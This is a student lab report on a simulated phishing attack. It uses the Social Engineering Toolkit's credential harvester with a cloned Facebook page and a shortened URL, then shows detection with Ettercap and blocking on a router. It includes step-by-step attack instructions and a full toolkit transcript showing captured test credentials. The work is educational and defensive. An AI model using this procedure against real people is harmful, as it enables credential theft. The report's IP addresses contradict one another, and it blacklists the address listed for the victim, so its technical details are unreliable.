3110 Team Project

Submission
Gone Phishing
Lab Section L02
Team #1
04/22/14





Gone Phishing Project Report - 1
Table of Contents
Table of Contents .......................................................................................................................................... 1
Purpose: ........................................................................................................................................................ 2
Equipment Used:........................................................................................................................................... 2
Information Table: ........................................................................................................................................ 4
Project Process and Procedure: .................................................................................................................... 4
Preface/Disclaimer: ....................................................................................................................................... 4
Part 1: Set Up Network Infrastructure ...................................................................................................... 4
Part 2: Set up the Attack ........................................................................................................................... 5
Screen Capture #1 Save Page As ....................................................................................................... 6
Screen Capture #2 Save the Cloned Page .......................................................................................... 7
Part 3: Perform the Capture ..................................................................................................................... 8
Terminal Output #1: SE Toolkit Capture .............................................................................................. 8
Part 4: Spot the Attack .............................................................................................................................. 8
Ettercap Output #1: Credential Capture ................................................................................................ 9
Part 5: Blacklist the Attacker ..................................................................................................................... 9
Screen Capture #3: Log into the Linksys Router ................................................................................ 10
Screen Capture #4: Create Access Policy ........................................................................................... 10
Screen Capture #5: Block the Attackers IP Address ......................................................................... 11
Conclusion and Summary: .......................................................................................................................... 12
Appendix A: SE-Toolkit Procedure .............................................................................................................. 13
Team Member Signatures:.......................................................................................................................... 16




Gone Phishing Project Report - 2
Purpose:
This project attempts to simulate a complete social engineering attack environment, complete
with attacker, victim, and system administrator. All three individuals are assumed to be on the
same network for testing purposes. This serves to simulate a university environment where one
student is trying to steal passwords from other students before an administrator in IT Services
stops them. An attacker, using Kali Linux, aims to steal a victim's credentials as they connect to
Facebook.com. A victim, running Windows 7, will connect via a shortened URL to what they
think is Facebook.com. When they enter their credentials into the fake web page they will be
harvested by Kali Linux and the victim will be rerouted to the real Facebook.com none the wiser.
To combat this, a system administrator running Raspbian on a Raspberry Pi will monitor network
traffic with the package Ettercap. Using Ettercap, the administrator can spot the transfer of stolen
credentials from the victim to the attacker. Once the attacker's IP address is identified, the
administrator can blacklist the attacker using settings on the local network's router.
Equipment Used:
Kali Linux Virtual Machine (Element from Lab 1 of 4)
This virtual machine acted as the attacker in our network environment. The element
from lab is the use of a virtual machine, VMWare Player, and the running an
operating system used in lab all in one. Each of these elements could be considered
separate if necessary to meet the requirements of four elements from lab. The
particular package that would be used within Kali Linux to perform the attack is
known as the Social Engineering Toolkit.
Raspberry Pi running Raspbian (Element from Lab 2 of 4)
The Raspberry Pi running the Raspbian operating system acted as a system
administrator in our network environment. Once it is discovered that a malicious user
on the network, the Kali Linux VM in this example, the administrator will utilize the
Gone Phishing Project Report - 3
tools at their disposal to capture evidence of the malicious activity and use this data to
blacklist the attackers IP address.
Ettercap (Element from Lab 3 of 4)
Ettercap is a packet capture and analysis application which will be used in this
environment by a system administrator to spot stolen credentials being transferred
from the victims IP address to the attackers IP address. The attackers IP address that
is captured here will be used by the router to blacklist the attacker. The Ettercap
package is not natively present on Raspbian, and therefore had to be installed before
the testing began.
Linksys WRT54G Router (Element from Lab 4 of 4)
The router acted as an access point for all three members of the test. Once the
Ettercap capture was complete, it was also used to blacklist the attackers IP address
so future attacks could be mitigated.
Windows 7 Laptop (Outside Element)
In order to make the testing environment as authentic as possible, the victims workstation
did not run a Linux system. Windows 7 was chosen both because of availability and because
it would represent the lab workstations available to students across campus in various
computer labs. It is highly possible at least a few students using lab workstations could fall
for this style of attack.







Gone Phishing Project Report - 4
Information Table:
Name Function IP address
Kali Linux VM Attacker 192.168.10.21
Windows 7 PC Victim 192.168.10.17
Raspberry Pi Administrator 192.168.10.22
Linux WRT54G
Router
Router 192.168.10.1

Project Process and Procedure:
Preface/Disclaimer: This project was originally going to be run within the 3110 Lab
environment. Because of campus restrictions on the use of penetrating testing tools like those
found in Kali Linux the project was moved off campus to avoid school reprimands. Permission
to move the project away from the lab was garnered from Professor Kombol before the project
was started.
Part 1: Set Up Network Infrastructure
The Linksys router used in the project was already configured when began, but if this test were
run with an out of the box router not much would change. The new router would have to be reset
to factory settings. Once the router was up and running, an admin would log in to set the router
password, SSID, and WPA passphrase. Assuming that the router is connected to the internet, the
project could progress without further router configuration at this point.
The attacker machine was booted up next. The Kali Linux virtual machine was booted up in
VMWare Player, and once the system was loaded the root user was accessed to make sure that all
necessary operations were available. A wireless connection to the router was already established
Gone Phishing Project Report - 5
on the host machine that was running VMWare player, and an ifconfig command confirmed the
IP address of the attackers machine to be 192.169.10.21. The Social Engineering Toolkit came
preinstalled on our instance of the system, but if it was not present it is possible to be installed
via the following command: apt-get install se-toolkit.
The victim workstation was the next to be brought online. As it was a laptop running Windows 7,
the OS was simply logged into and a wireless connection was established with the built in
Windows wireless connection tools. An ipconfig all command revealed the IP address of the
victims computer to be 192.168.10.17.
The last workstation to be initialized was the administrators Rasbperry Pi. To avoid hassle with
wirelessly connecting the Pi via the command line, the Pi was connected to the router via an
Ethernet cable. An ifconfig command revealed the administrators IP address to be
192.168.10.22. Once an active internet connection was established, the package database was
updated with the following command: apt-get update. Once that process was finished, the
Ettercap package was installed with the following command: apt-get install ettercap. To make
Ettercap easier to use, the startx command was run at this point to start up the Raspbian GUI.
Part 2: Set up the Attack
Now that the network infrastructure was configured and each workstation was equipped with the
necessary tools, it was time to set up the attack. Within the Kali Linux VM, the command se-
toolkit was run. The entire dialogue can be found in Appendix A, but an abridged version of the
procedure of the attack is as follows. Each command is assumed to be run within the Kali Linux
VM. The attack we chose to run is referred to as a Custom Import Attack. The attack goes as
follows:
A complete copy of a website is downloaded via a browser on the attacker workstation.
Users are directed to the attackers IP address which will host the copied website.
Users enter in their log in credentials in the copied website believing that it is the real
thing.
The attacker gets a copy of the credentials typed into the copied web site.
Users are redirected to the real website after clicking the log in button on the copied
website, none the wiser that they visited a fake version of the web site.
Gone Phishing Project Report - 6
To begin, the command se-toolkit was run. This generated a wall of text explaining each of seven
attack options. The one used in this particular test was the Credential Harvester Attack Method,
and therefore option three was selected by typing the number 3 in the command line and hitting
return. Within the Credential Harvester menu, three options were presented. The option chosen
was Custom Import, which also happened to option number three. The number 3 was submitted
again, and now that the attack had been chosen, we were prompted for a few pieces of
information to get the exploit up and running.
The first piece of information asked for was the IP address of where to send the captured
credentials once the attack was finished. This allowed for a remote server or member of a bot net
to capture data to avoid the attack being traced to the attackers computer. For the purposes of
this test, the native IP address (192.168.10.21) of the Kali Linux VM was used. The next piece of
information asked for was cloned web site which would be presented to the user as if it were the
real web site and would act as a medium by which to capture the users credentials. Our copy of
Facebook.com was obtained by saving it within the Firefox browser. The method of copying a
website within in Firefox is first to select the Firefox button on the top left corner of the browser
to open the menu and then selecting Save Page As within the menu. This is demonstrated by the
following screen capture.
Screen Capture #1 Save Page As

Gone Phishing Project Report - 7
Once Save Page As is selected, a menu is opened so the user can choose where to save the web
site. The important thing to remember when performing this second step is to save the copied
web page as index.html so that the Social Engineering Toolkit can find the file. Also, the style of
page saved must remain as the default Web Page, Complete. This step is shown through the
following screen capture.
Screen Capture #2 Save the Cloned Page

Once the spoofed web page was saved as index.html, the file path was entered in the dialogue of
the toolkit. The original index.html file was downloaded on a Windows system and copied via
SSH to the Kali Linux VM. The location it was copied to was the root of the Kali Linux VM.
This usually is a very unwise decision, but for the ease of use in the testing environment, the
final file path that was fed to the toolkit was /index.html. The last piece of information required
by the toolkit dialogue was the URL of the original site. This was needed so that after the
credentials were captured the victim can be redirected to the real Facebook.
Gone Phishing Project Report - 8
Now that all the required information was inputted, the attack was ready to run. A shortened
URL was created to trick the victim into thinking our link led to the real Facebook.com. This
URL actually linked to the IP address of the Kali Linux VM.
Part 3: Perform the Capture
Once the attacker machine was actively listening for credentials to capture, it was time for the
victim workstation to play its part. The victim was sent the shortened URL in an email, and they
clicked the link to log into what they thought was Facebook.com Because the copied web page
was cloned from the original, there was no graphical difference between the copy and the
original Facebook.com. After entering their username and password, the victim clicked on the
submit button and the page appeared to refresh. This refresh was actually a redirect to the real
Facebook.com home page. The victim was then presented with the actual Facebook.com and
would have no idea that they had ever visited anything but the real deal.
While the victim would be clueless, the attacker learned quite a bit once the submit button was
clicked. As soon as the victim was redirected to the authentic Facebook.com, the attacker was
greeted with the data sent from the victims form submission. The Social Engineering Toolkit
parses the packet and picks out possible usernames and passwords. The following terminal
output shows what data was sent from the victims workstation.
Terminal Output #1: SE Toolkit Capture
POSSIBLE USERNAME FIELD FOUND: email=victim@test.com
POSSIBLE PASSWORD FIELD FOUND: pass=mysecretpassword
Now that the credentials were obtained by the Kali Linux VM, the attack was considered
complete.
Part 4: Spot the Attack
For the purposes of the simulation, the system administrator is assumed to always be monitoring
traffic for malicious content. This is accomplished through the application Ettercap. To monitor
all traffic on a network, Ettercap can be set to Bridged Sniffing mode, which allows the
administrator to see, and modify packets, before they are sent on to their destination. This is the
most basic form of Man in the Middle attack.
Gone Phishing Project Report - 9
Once Bridged Sniffing mode was started, it was simply a matter of time until the victim
navigated to the cloned, fake Facebook.com and entered their log in credentials. When the victim
clicked the submit button, before the packet was sent on the attacker to be recorded by the Social
Engineering Toolkit, the following data showed up in the Ettercap dialogue window.
Ettercap Output #1: Credential Capture
HTTP : 192.168.0.17:80 -> USER: jdjs PASS: hxnx INFO: http://192.168.0.17/
CONTENT: lsd=AVoS8prE&email=jdjs&pass=hxnx&default_persistent=0&timezone=240&
lgnrnd=170553_Dkly&lgnjs=1396310733&locale=en_US
There are two pieces of information revealed within this data capture. First, the final destination
for the data is 192.168.10.17, which is known to be the attackers IP address. The system
administrator would look at this packet and know that someone on the local network, known by
the class of the IP address, was taking in data from an outside source. Second, the victims
credentials are shown within the USER and PASS sections of the packet. The system
administrator would be able to connect these two pieces of information to summarize that
someone on the local network was capturing credentials. Upon discovering this, the system
administrator would take lengths to blacklist the malicious user.
Part 5: Blacklist the Attacker
To blacklist the attacker within this simulation, the system administrator chose to use the built in
tools within the Linux routers web interface. After logging in with the credentials created in Part
1, they were greeted with the routers home page. The splash page appeared as shown below.
Gone Phishing Project Report - 10
Screen Capture #3: Log into the Linksys Router

To blacklist an IP address, the Access Restrictions tab was navigated to, and an Internet Access
Policy was created. This policy was named BlockAttacker and was set to deny users seven days a
week, 24 hours a day. This is shown in the following screen capture.
Screen Capture #4: Create Access Policy

The policy to block the attacker had now been created, but the router did not yet know who to
apply this policy to. To resolve this, the button labeled Edit List of PCs was clicked on to open a
menu where a list or range of IP address could be entered. All IPs listed in this menu would have
Gone Phishing Project Report - 11
the previously created policy applied to them. The following screen capture shows the attackers
IP address, 192.168.10.17, having been entered into the policy.
Screen Capture #5: Block the Attackers IP Address

Once the IP address was entered, the Save Settings button was clicked. This saved the policy to
block the IP address 192.168.10.17 on the router all of the time. With this countermeasure, the
attackers machine could no longer continue to steal credentials from the victim. With the
attacker foiled, the simulation and project was concluded.

Gone Phishing Project Report - 12
Conclusion and Summary:
This project went through quite a few revisions before it finally became a reality. Originally, the
fake Facebook.com was going to be a custom created Facebook.com clone that was hosted on an
Apache server running on a Raspberry Pi. The site was completed, but with the way that the se-
toolkit is set up to work the site was never needed. Once the se-toolkit was loaded up, our group
was faced with two different options to perform out attack. These two options were Site Cloner
and Custom Import. While the final decision fell to Custom Import, our group spent quite a bit of
time working with the Site Cloner functionality before switching. The Site Cloner attack focuses
on DNS poisoning on the victim machine, thereby sending the victim to the wrong site when
they enter www.facebook.com in their web browser. While this attack seemed more effective in
the real world, the idea of having to gain access to the victim's computer and edit their DNS
record before the attack can take place seemed highly unrealistic for the environment our group
had set up. Because of this, the Custom Import option was out final choice for playing out the
attack.
Each of the members in our group came into this project having some knowledge of how Kali
Linux could be used for penetration testing, but none of us had ever had taken the effort to set up
an all-inclusive testing environment so that the real power of Kali Linux could be explored. This
project allowed up to perform hacking attacks that would not be allowed on campus, as well as
reinforce concepts learned in lab. These concepts include router access policies, wireless
networking, and interpreting data from captured packets.




Gone Phishing Project Report - 13
Appendix A: SE-Toolkit Procedure
The dialogue below is the entire procedure for running the attack from the Kali Linux VM. Items
in bold below are elements of user input. All non-formatted text is generated by the system to
provide the user with information about what choices to make and what information has been
captured. The discovered credentials have been underlined.
root@kali#: se-toolkit
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the
intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a
customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and
harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method
utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window
pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too
slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can
utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
Gone Phishing Project Report - 14
6) Multi-Attack Web Method
7) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>3
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.0.21
[!] Example: /home/website/ (make sure you end with /)
[!] Also note that there MUST be an index.html in the folder you point to.
Gone Phishing Project Report - 15
set:webattack> Path to the website to be cloned:/index.html
[-] Example: http://www.blah.com
set:webattack> URL of the website you imported:https://www.facebook.com
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.0.22 - - [31/Mar/2014 20:12:01] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVoS8prE
POSSIBLE USERNAME FIELD FOUND: email=victim@test.com
POSSIBLE PASSWORD FIELD FOUND: pass=mysecretpassword
PARAM: default_persistent=0
PARAM: timezone=240
PARAM: lgnrnd=170553_Dkly
PARAM: lgnjs=1396310733
PARAM: locale=en_US
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.





Gone Phishing Project Report - 16
Team Member Signatures:
Team Members (alphabetical by last name):
Capt Name (printed) Signature
1) Deapo, Donald
2) Green, Kevin
3) Hall, Taylor
* 4) Vance, Philip

Capt: Identify the team captain as point of contact with an asterisk (only one)